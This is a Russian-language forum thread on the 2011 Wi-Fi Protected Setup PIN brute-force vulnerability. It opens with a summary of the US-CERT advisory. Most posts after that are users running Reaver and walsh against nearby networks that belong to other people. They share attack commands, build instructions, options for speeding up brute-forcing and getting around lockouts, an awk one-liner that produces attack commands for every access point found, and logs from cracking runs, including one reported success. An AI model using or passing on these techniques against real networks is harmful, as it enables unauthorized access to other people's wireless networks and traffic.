Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. gpuhash

    gpuhash Elder - Старейшина

    Joined:
    22 Sep 2011
    Messages:
    491
    Likes Received:
    2,159
    Reputations:
    97
    Уязвимость в протоколе Wi-Fi Protected Setup

    Организация US Computer Emergency Readiness Team опубликовала бюллетень безопасности, описывающий уязвимость в протоколе WPS (Wi-Fi Protected Setup), предназначенном для облегчения настройки безопасности беспроводных роутеров и сетей. Сам протокол — его оригинальное название Wi-Fi Simple Config — был разработан в 2009 году специалистами ассоциации Wi-Fi Alliance целью дать возможность с некоторой долей безопасности пользоваться Wi-Fi лицам, мало сведущим в протоколах и стойких методах шифрования.

    Традиционно при создании новых WLAN необходимо было выбрать сетевое имя и кодовую фразу для точки доступа, а позднее то же самое — для каждого нового устройства, добавляемого к сети. WPS для упрощения процедуры для конечного пользователя возлагает функцию генерации сетевого имени на саму точку доступа. Для добавления нового клиентского устройства к защищенной сети достаточно будет ввести PIN-код из 4 или 8 цифр или нажать на специальные клавиши, имеющиеся на роутере и добавляемом устройстве.

    Суть уязвимости заключается в специфике общения между собой точки доступа и новым беспроводным устройством. Злоумышленник, желая получить доступ к сети жертвы, посылает некий PIN-код для аутентификации на роутере. В ответ на неправильный PIN посылается EAP-NACK сообщение таким образом, что хакер способен определить первую половину цифр PIN-кода, а вторую половину оказывается возможным определить, анализируя контрольную сумму при передаче PIN. Все это приводит к тому, что атака методом «грубой силы», вероятней всего, завершится успехом, поскольку число необходимых попыток уменьшается с 10^8 до 10^4+10^3 = 11.000, а время полного перебора PIN-кодов составит от нескольких часов до нескольких суток, в зависимости от реализации WPS на роутере.

    Пока решения проблемы не существует и тем, у кого роутер настроен на упрощенную схему безопасности, рекомендуется использовать традиционную схему аутентификации. Netgear, D-Link, Belkin и другие производители пока не прокомментировали сообщение об уязвимости.

    Копипаст с хабра
    Документ с описанием уязвимости (англ.)
    Добрые люди уже написали WPS брутфорсер

    любые вопросы не по теме удаляются !! выкладывать только инфу WPS , (reaver)


    // добавлено в карту раздела.

    за троль оффтоп , бан от 7 суток .
     
    #1 gpuhash, 30 Dec 2011
    Last edited by a moderator: 20 Mar 2013
    4Fun, samuro2, Vikhedgehog and 3 others like this.
  2. EksTasy

    EksTasy Member

    Joined:
    26 Oct 2008
    Messages:
    69
    Likes Received:
    6
    Reputations:
    10
    никто не компилил?
    скрипт на питоне от самого автора
    http://dl.dropbox.com/u/22108808/wpscrack.zip
     
    #2 EksTasy, 30 Dec 2011
    Last edited: 30 Dec 2011
  3. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    попробовал юзнуть wps-bruteeforcer, при команде reaver -i mon0 -b mac -c [канал\ -e [essid] пишет Failed to associate with [mac]
     
  4. jabberd

    jabberd Member

    Joined:
    3 May 2010
    Messages:
    12
    Likes Received:
    7
    Reputations:
    0
    Стоит, наверное, обновить Reaver с помощью svn up, проблема ассоциации была решена. У меня, к сожалению, на роутере Netgear WNR3500L не работает WPS по причине установленной прошивки Tomato-USB. На чужих сетях ничего не получается, хотя Wireshark и показывает наличие настроенного WPS. У кого-нибудь уже получалось подобрать PIN и получить WPA-PSK?
     
  5. kosmaty

    kosmaty Elder - Старейшина

    Joined:
    26 Sep 2011
    Messages:
    292
    Likes Received:
    38
    Reputations:
    27
    У меня не получилось и не получится.... А жаль.
    ТД организована не на базе роутера, а по-взрослому - Ubiquiti. А там такая дырявая вещь, как WPS не применяется....
     
  6. zuriuslev

    zuriuslev Member

    Joined:
    24 Dec 2011
    Messages:
    142
    Likes Received:
    19
    Reputations:
    20
    Простите новичка, а как определить в Wireshark, что включен WPS ? Может фильтр какой есть ?
     
  7. penixx

    penixx Member

    Joined:
    24 Jun 2011
    Messages:
    151
    Likes Received:
    14
    Reputations:
    8

    ассоциация есть, но дальше ничего, пробовал 2 раза по 5 минут ждать

    root@bt:~# reaver -i mon0 -b ------------

    Reaver v1.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

    [+] Waiting for beacon from ------------
    [+] Associated with ------------ (ESSID: ------------)
    [+] 0.00% complete @ 0 seconds/attempt
    [+] 0.00% complete @ 0 seconds/attempt

    буду на других точках пробовать
     
  8. jabberd

    jabberd Member

    Joined:
    3 May 2010
    Messages:
    12
    Likes Received:
    7
    Reputations:
    0
    Я ставил фильтр: wps.wifi_protected_setup_state == 0x02
    Мог и ошибиться, конечно, но в любом случае копать в тег-параметры (vendor specific) beacon-пакетов.

    P.S. сейчас в Reaver есть программа walsh, которая показывает точки со включённой WPS.
     
    #8 jabberd, 3 Jan 2012
    Last edited: 3 Jan 2012
  9. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    поподробнее про walsh плз
     
  10. zuriuslev

    zuriuslev Member

    Joined:
    24 Dec 2011
    Messages:
    142
    Likes Received:
    19
    Reputations:
    20
    Например -
    walsh -i mon0 -o WPS.list
    grep -v "bad FCS" WPS.list

    и полусаем, что-то вроде -
    Scanning for supported APs...

    54:E6:FC:D1:18:F6 (null)
    D8:5D:4C:F3:44:6A ApptNet
    00:22:75:52:BD:4E Belkin_N_Wireless_52bd4e
    00:1D:7E:B4:1F:B6 lafferty
    00:19:15:D0:5C:29 WLAN_5C29
    00:24:17:BB:44:BD ThomsonE4849E
    00:50:7F:7C:E5:F8 Ellie
    -----------------------------------------
    Можно коммандный файл сгенерить -
    awk '/[0-9][A-F]/{print "reaver -i mon0 -b "$1" -e "$2}' WPS.list
    ---------------------------------------------------------------
    У меня пока безуспешно ... Пару раз проскакивало -
    [+] Trying pin 84490445
    Но дальше не продвигается.
    Кстати , walsh ловит ВСЕ точки c WPS и OPEN (без шифрования тоже)

    Напустил его на OPEN точку, работает ... :D :D :D
    [+] Waiting for beacon from 00:22:75:52:BD:4E
    [+] Associated with 00:22:75:52:BD:4E (ESSID: Belkin_N_Wireless_52bd4e)
    [+] 0.01% complete @ 37 seconds/attempt
    [+] 0.03% complete @ 20 seconds/attempt
    [+] 0.05% complete @ 19 seconds/attempt
    [+] 0.07% complete @ 16 seconds/attempt
    [+] 0.08% complete @ 31 seconds/attempt
    :D :D :D :D
     
    #10 zuriuslev, 3 Jan 2012
    Last edited by a moderator: 3 Jan 2012
    1 person likes this.
  11. zuriuslev

    zuriuslev Member

    Joined:
    24 Dec 2011
    Messages:
    142
    Likes Received:
    19
    Reputations:
    20
    Зацепился за одну из точек, но процесс идёт очень медленно.
    За 4 часа прогресс такой -
    [+] 9.35% complete @ 15 seconds/attempt
    [+] 9.39% complete @ 15 seconds/attempt

    Похоже, режультат будет видно через пару суток :mad:
    Надеюсь будет положительный :rolleyes:
     
  12. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    странно я когда walsh прописываю пишет не существует типо такого...
     
  13. zuriuslev

    zuriuslev Member

    Joined:
    24 Dec 2011
    Messages:
    142
    Likes Received:
    19
    Reputations:
    20
    Скомпилируй последний билд из SVN

    Code:
    svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
    cd reaver-wps-read-only/src
    ./configure
    make
    make install
    Проект активно развивается, перед запуском на долгие сутки, лучше пересобрать свежачок ...

    Для ускорения перебора, можно уменьшать тайминги здесь -
    Code:
    Advanced Options:
    	-p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    	-d, --delay=<seconds>           Set the delay between pin attempts [1]
    	-l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [315]
    	-g, --max-attempts=<num>        Quit after num pin attempts
    	-x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    	-r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    	-t, --timeout=<seconds>         Set the receive timeout perio [5]
    	-T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    	-L, --ignore-locks              Ignore locked state reported by the target AP
    	-E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    	-n, --nack                      Target AP always sends a NACK [Auto]
    	-w, --win7                      Mimic a Windows 7 registrar [False]
    Согласно доке, если AP не блокирует, то время перебора будет
    не более 4 часов.
    Если придерживаться спецификаций WSC 2.0, перебор может продолжатться до 65 часов.
    С дефолтными настройками, оно так и будет.
     
    #13 zuriuslev, 3 Jan 2012
    Last edited: 4 Jan 2012
  14. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    zuriuslev

    главное дождаться результата!
     
  15. zuriuslev

    zuriuslev Member

    Joined:
    24 Dec 2011
    Messages:
    142
    Likes Received:
    19
    Reputations:
    20
    Дождусь ! У меня вся эта байда на UPS ;) А UPS всю эту байду, часов 5 продержит :D

    Кстати, 6 часов назад, автор внёс новые опции для ускорения процесса -
    Code:
    Added --dh-small option for speed improvements.
     
  16. penixx

    penixx Member

    Joined:
    24 Jun 2011
    Messages:
    151
    Likes Received:
    14
    Reputations:
    8
    Scapy http://www.secdev.org/projects/scapy/

    пишут ещё PyCrypto нужен, но мне на батраке не понадобилcя, наверное есть уже
     
    #16 penixx, 4 Jan 2012
    Last edited: 4 Jan 2012
  17. penixx

    penixx Member

    Joined:
    24 Jun 2011
    Messages:
    151
    Likes Received:
    14
    Reputations:
    8
    какие добавлял опции к команде: reaver -i mon0 -b ------------
    или так по умолчанию и использовал ?

    а вообще здорово за 4 часа, а у меня разрывает ассоциацию ((
     
  18. zuriuslev

    zuriuslev Member

    Joined:
    24 Dec 2011
    Messages:
    142
    Likes Received:
    19
    Reputations:
    20
    Поздравляю . Мньше чем за 4 часа. А ключик проверили ?

    У мня уже почти 18 часов крутится, но должно скоро закончиться ;)
    Code:
    [+] 97.30% complete @ 10 seconds/attempt
    [+] 97.35% complete @ 10 seconds/attempt
    [+] 97.39% complete @ 10 seconds/attempt
    Сейчас опять очередной лок от АП ... значит 5 минут ждёмс ...
    У меня в начале было 16 seconds/attempt, а на финише 10 seconds/attempt.
    НО ! Похоже участились локи :(
     
    #18 zuriuslev, 4 Jan 2012
    Last edited: 4 Jan 2012
  19. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    Просканил через Walsh, нашел 5 сетей.Везде FAILED to associate.Что можно придумать?
     
  20. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    ха........... нет не так , кароче сам список создаеться но внем ничего не находит пишет что нету нифига но точек куча неужели среди 100 точек нету ниодной тут разные провайдеры шифрование роутеры моделей 8 наверное разных а так же пользователи и полный ноль ........... странно .......


    нашло пин 8 цыфр за 2 минуты .......... папиросу выкурить не успел .......
    едим дальше
     
    #20 теща, 4 Jan 2012
    Last edited: 4 Jan 2012